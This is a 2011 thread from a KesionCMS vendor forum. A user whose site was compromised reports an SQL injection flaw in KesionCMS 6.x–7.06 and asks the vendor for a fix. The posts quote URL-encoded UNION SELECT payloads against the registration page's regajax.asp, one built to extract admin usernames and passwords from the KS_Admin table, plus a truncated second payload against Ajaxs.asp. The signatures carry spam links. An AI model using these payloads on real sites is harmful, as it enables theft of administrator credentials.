官方能不能解决啊科讯 6.x – 7.06 漏洞 (SQL 注射漏洞)-领先建站CMS提供服务商我们专注于CMS建站产品的研发

kesion

<<返回列表上一个主题下一个主题打印本帖复制本帖地址

4168 查看	6 回复

主题：[已解决]官方能不能解决啊科讯 6.x – 7.06 漏洞 (SQL 注射漏洞) [收藏主题]

转到：

wancn 当前离线

315 主题	0 广播	0 粉丝

添加关注

级别:三年级

用户积分:3644 分
登录次数:448 次
注册时间:2007/9/19
最后登录:2012/12/5

当前不在线

wancn 发表于：2011/9/1 8:21:45 | 显示全部帖子查看该作者主题楼主

科汛在线商城系统(NET)

做官网就用科汛智能建站系统!

漏洞存在于注册页面

ACCESS：

http://www.test.com/user/reg/regajax.asp?action=getcityoption&;province=%2527%2520%2575%256e%2569%256f%256e%2520%2553%2565%256c%2565%2563%2574%2520%2574%256f%2570%2520%2531%2530%2520%2541%

SQL:

http://www.test.com/user/reg/regajax.asp?action=getcityoption&;province=goingta%2527%2520union%2520%2573%2565%256C%2565%2563%2574%25201,username%252B%2527%257C%2527%252Bpassword%2520from%2520KS_Admin%2500

最近被挂马了。

做新职业技能培训平台就选#科汛网校

反对(4)

回到顶部

回到底部

底部

wancn 当前离线

315 主题	0 广播	0 粉丝

添加关注

级别:三年级

用户积分:3644 分
登录次数:448 次
注册时间:2007/9/19
最后登录:2012/12/5

当前不在线

wancn 发表于：2011/9/1 8:25:14 | 显示全部帖子查看该作者主题沙发

科汛在线考试系统(NET)

做官网就用科汛智能建站系统!

还有一个http://www.test.com /plus/Ajaxs.asp?action=GetRelativeItem&Key=goingta%2525%2527%2529%2520%2575%256E%2569%256F%256E%2520%2573%256

以上是网上收集的。

<a href=http://www.fzlgo.com target=_blank>非主流个性签名</a> <a href=http://www.whjiehun.com target=_blank>婚纱照片欣赏</a>

做考试题库就用#科汛在线考试系统!

反对(5)

回到顶部

回到底部

底部

＜上一主题 | 下一主题＞

Powered By KesionCMS Version X1

厦门科汛软件有限公司 © 2006-2016 页面执行0.09375秒 powered by KesionCMS 9.0